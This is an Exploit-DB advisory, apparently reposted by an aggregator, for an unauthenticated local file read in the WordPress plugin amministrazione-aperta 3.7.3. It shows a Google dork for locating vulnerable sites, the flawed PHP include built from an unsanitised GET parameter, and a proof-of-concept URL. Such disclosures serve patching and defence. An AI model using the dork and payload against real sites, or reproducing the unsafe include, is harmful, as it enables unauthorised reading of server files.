[webapps] WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
2022-3-23 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:18 收藏
2022-3-23 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:18 收藏
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox
# Vulnerable File: dispatcher.php
# Vulnerable Code:
```
if ( isset($_GET['open']) ) {
include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
echo '
<div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
<div class="welcome-panel-column-container">';
include_once( ABSPATH . WPINC . '/feed.php' );
```
# Proof of Concept:
localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
文章来源: https://www.exploit-db.com/exploits/50838
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh